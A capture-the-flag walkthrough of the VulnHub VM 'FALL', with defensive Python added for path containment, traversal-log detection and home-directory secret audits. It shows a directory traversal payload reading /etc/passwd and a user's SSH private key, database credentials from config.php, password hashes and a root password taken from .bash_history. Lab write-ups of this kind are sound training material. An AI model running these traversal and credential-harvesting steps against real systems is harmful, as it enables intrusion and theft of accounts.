FALL
FALL (aka digitalworld.local: FALL) is a virtual machine you can try yourself by downloading it from VulnHub.
NMAP
I start pretty much every time with finding out what ports are open:
$ nmap -sV -sC --open -p- -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-18 01:42 EDT
Stats: 0:05:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.40% done; ETC: 02:27 (0:40:16 remaining)
Stats: 0:10:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 27.09% done; ETC: 02:19 (0:27:17 remaining)
Stats: 0:22:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.05% done; ETC: 02:08 (0:03:24 remaining)
Nmap scan report for 10.0.1.147
Host is up (0.58s latency).
Not shown: 63995 filtered tcp ports (no-response), 1527 filtered tcp ports (host-unreach), 6 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| http-robots.txt: 1 disallowed entry
|_/
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
|_ssl-date: TLS randomness does not represent time
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://10.0.1.147:9090/
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m31s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2022-06-17T23:07:40-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-06-18T06:07:38
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Port 22
SSH is running; this will come in handy later!
Port 80
Web Application
CMS Made Simple version 2.2.15
I did my usual gobuster search for directories, poked around in them, but didn't come up with much.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.1.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/18 01:54:33 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 234] [--> http://10.0.1.147/modules/]
/uploads (Status: 301) [Size: 234] [--> http://10.0.1.147/uploads/]
/doc (Status: 301) [Size: 230] [--> http://10.0.1.147/doc/]
/admin (Status: 301) [Size: 232] [--> http://10.0.1.147/admin/]
/assets (Status: 301) [Size: 233] [--> http://10.0.1.147/assets/]
/lib (Status: 301) [Size: 230] [--> http://10.0.1.147/lib/]
/tmp (Status: 301) [Size: 230] [--> http://10.0.1.147/tmp/]
I tried looking in exploit-db for this specific version and turned up basically nothing.
Eventually, one of the many fuzzing lists I tried was the CommonBackdoors-PHP.fuzz.txt from seclists. It turned up a very useful file:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://$IP
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.1.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/test.php (Status: 200) [Size: 80]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
Misc
The only other information I turned up does at least give us a potential username:
<script>alert('Page not found! Please contact our infrastructure head at patrick@goodtech.inc if you think this is in error!');
Port 139, 445
Nothing really going on with SMB:
$ smbclient -L $IP -U guest
Password for [WORKGROUP\guest]:
session setup failed: NT_STATUS_LOGON_FAILURE
$ smbmap -H $IP -d WORKGROUP
[+] IP: 10.0.1.147:445 Name: 10.0.1.147
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.8.10)
Port 3306
Doesn't seem to be a direct way into the database remotely:
$ mysql -h $IP
ERROR 1130 (HY000): Host '10.0.1.136' is not allowed to connect to this MySQL server
Port 9090
I spent some time looking for vulnerabilities, default passwords, fuzzing directories, etc. but didn't find anything very interesting.
Initial Access
Our best bet is that test.php script we found. When we browse to it, we receive an alert that there is a missing GET parameter.
<html>
<body>
<script>alert('Missing GET parameter!');</script>
</body>
</html>
I don't remember how I stumbled on the parameter being named file, but with that we can read any file that is accessible to the user the web server is running as.
But what files should we try to read? There's always /etc/passwd, which at best may include passwords or hashes directly (though rarely), and at worst should still give us some usernames.
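The writeup never shows the source of test.php, so here is an added example (my own code, not from the box or its author) of the defect it must contain and of the fix: a user-supplied file name joined onto the web root with no containment check, next to a resolver that normalises the path and rejects anything that lands outside the root. The same check doubles as detection logic over Apache access-log lines. The web root (/var/www/html), the handler's return values and the sample log lines are all assumptions or constructed for the demo.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed web root; the real DocumentRoot on the box is not shown in the writeup.
WEB_ROOT = "/var/www/html"


def resolve_vulnerable(web_root: str, user_file: str) -> str:
    """What a naive test.php does with $_GET['file']: the user-supplied path is
    joined onto the web root unchecked, so every '../' walks one level up."""
    return os.path.normpath(os.path.join(web_root, user_file))


def resolve_hardened(web_root: str, user_file: str) -> Optional[str]:
    """Normalise the candidate path and accept it only if it is strictly inside
    web_root. Returns the safe absolute path, or None if the request escapes.
    (Lexical check; on a live tree add os.path.realpath so symlinks are resolved too.)"""
    if "\x00" in user_file:                      # NUL truncation trick in older PHP
        return None
    root = os.path.normpath(web_root)
    # strip leading slashes: os.path.join would otherwise discard root for absolute input
    candidate = os.path.normpath(os.path.join(root, user_file.lstrip("/")))
    if not candidate.startswith(root + os.sep):  # also rejects root itself and /var/www/html2
        return None
    return candidate


def handle_request(params: dict, web_root: str = WEB_ROOT) -> Tuple[int, str]:
    """Hardened stand-in for the page's test.php: keeps the 'Missing GET parameter!'
    behaviour but only serves files that resolve inside the web root."""
    user_file = params.get("file")
    if user_file is None:
        return 400, "Missing GET parameter!"
    target = resolve_hardened(web_root, user_file)
    if target is None:
        return 403, "Forbidden"
    return 200, target          # a real handler would read and return the file here


# Detection side: flag access-log entries whose ?file= value escapes the web root.
_REQ = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+"')


def flag_traversal_requests(log_lines: List[str], web_root: str = WEB_ROOT) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded file parameter) for each log line where the
    'file' parameter would not resolve inside web_root. Values are URL-decoded a
    second time so a double-encoded '%252e%252e/' is judged the same way."""
    hits = []
    for line in log_lines:
        m = _REQ.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get("file", []):
            decoded = unquote(value)
            if resolve_hardened(web_root, decoded) is None:
                hits.append((m.group("ip"), decoded))
    return hits


# Constructed sample log lines in Apache combined format (not taken from the box).
SAMPLE_LOG = [
    '10.0.1.136 - - [18/Jun/2022:01:58:03 -0400] "GET /test.php?file=../../../../../../etc/passwd HTTP/1.1" 200 1523 "-" "curl/7.83"',
    '10.0.1.136 - - [18/Jun/2022:01:58:09 -0400] "GET /test.php?file=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 1523 "-" "curl/7.83"',
    '10.0.1.50 - - [18/Jun/2022:02:01:44 -0400] "GET /test.php?file=pages/about.html HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '10.0.1.50 - - [18/Jun/2022:02:01:50 -0400] "GET /index.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(resolve_vulnerable(WEB_ROOT, "../../../../../../etc/passwd"))   # /etc/passwd
    print(handle_request({"file": "../../../../../../etc/passwd"}))      # (403, 'Forbidden')
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: file={value!r}")
```

The prefix check uses root plus a separator on purpose: comparing against the bare root string would accept a sibling directory such as /var/www/html2. Because the detector reuses resolve_hardened, the log review and the server-side fix cannot disagree about what counts as an escape.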
Directory Traversal / Local File Inclusion
http://10.0.1.147/test.php?file=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
So qiu is a valid user. What are some of the most useful files a user might have? Well, it turns out that /home/qiu/.ssh/id_rsa is readable. So let's grab that and then SSH to the box as qiu:
$ ssh -i ./id_rsa qiu@$IP
local.txt
[qiu@FALL ~]$ cat local.txt
A low privilege shell! :-)
Escalating Privileges
Let's look around for more information. We find some configuration files with possibly some more credentials:
PHP Configuration
[qiu@FALL html]$ more config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '127.0.0.1';
$config['db_username'] = 'cms_user';
$config['db_password'] = 'P@ssw0rdINSANITY';
$config['db_name'] = 'cms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'Asia/Singapore';
$config['db_port'] = 3306;
?>
We can use those database credentials to read what might be even more credentials from the web application's users table:
CMS Users Table
mysql> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
| 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)
Found password?
Ah, the good ol' .bash_history file:
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
Root password is remarkablyawesomE
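Two exposures carried this box from file read to root: a private key the web server user could read, and a password typed onto a command line and preserved in .bash_history. As an added example (my own code, not part of the writeup), here is a small audit that finds both in a home directory: private keys with group/other read bits set, and history lines that put a secret on the command line such as `echo "..." | sudo -S`. It builds a throwaway home directory with placeholder values to run against, so nothing here is taken from the box; the set of key file names and the history patterns are my own choices.

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Files whose contents are secrets and must never be readable by other users.
PRIVATE_KEY_NAMES = ("id_rsa", "id_ecdsa", "id_ed25519", "id_dsa")
HISTORY_NAMES = (".bash_history", ".zsh_history", ".sh_history")

# Command shapes that place a secret on the command line (and therefore in history).
HISTORY_PATTERNS = [
    re.compile(r'echo\s+["\']?[^"\'|]+["\']?\s*\|\s*sudo\s+-S'),  # echo "pw" | sudo -S ...
    re.compile(r'\bmysql\b.*\s-p\S+'),                            # mysql -pSECRET
    re.compile(r'--password=\S+'),
]


def exposed_private_keys(home: str) -> List[Tuple[str, str]]:
    """Return (path, octal mode) for private keys under home that group or others can read."""
    findings = []
    for dirpath, _dirs, files in os.walk(home):
        for name in files:
            if name in PRIVATE_KEY_NAMES:
                path = os.path.join(dirpath, name)
                mode = stat.S_IMODE(os.stat(path).st_mode)
                if mode & (stat.S_IRGRP | stat.S_IROTH):
                    findings.append((path, oct(mode)))
    return findings


def secrets_in_history(home: str) -> List[Tuple[str, int, str]]:
    """Return (path, line_no, line) for history lines matching a secret-on-command-line pattern."""
    findings = []
    for name in HISTORY_NAMES:
        path = os.path.join(home, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for no, line in enumerate(fh, 1):
                if any(p.search(line) for p in HISTORY_PATTERNS):
                    findings.append((path, no, line.rstrip("\n")))
    return findings


def build_sample_home() -> str:
    """Construct a throwaway home directory reproducing the two exposures from the box:
    a world-readable SSH key and a root password echoed into sudo -S. Placeholder values only."""
    home = tempfile.mkdtemp(prefix="audit-demo-")
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir)
    key = os.path.join(ssh_dir, "id_rsa")
    with open(key, "w") as fh:
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(key, 0o644)                  # the mistake: group and others can read the key
    with open(os.path.join(home, ".bash_history"), "w") as fh:
        fh.write("ls -al\ncat .bash_history\nrm .bash_history\n"
                 'echo "PLACEHOLDER_PASSWORD" | sudo -S dnf update\n')
    return home


def audit(home: str) -> dict:
    """Run both checks and return the findings keyed by category."""
    return {"keys": exposed_private_keys(home), "history": secrets_in_history(home)}


if __name__ == "__main__":
    demo_home = build_sample_home()
    for category, items in audit(demo_home).items():
        for item in items:
            print(category, item)
```

Point the two check functions at a real home directory (for example, os.path.expanduser("~")) to audit it; the fixes are the obvious ones, chmod 600 on the key and a passwordless sudo rule or an interactive prompt instead of echoing the password into sudo -S. Note that the box's history shows the user deleting .bash_history and then continuing to type, which is why the secret survived.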
root.txt
[qiu@FALL ~]$ su
Password:
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
Thanks
Thanks to Donovan for authoring a fun box!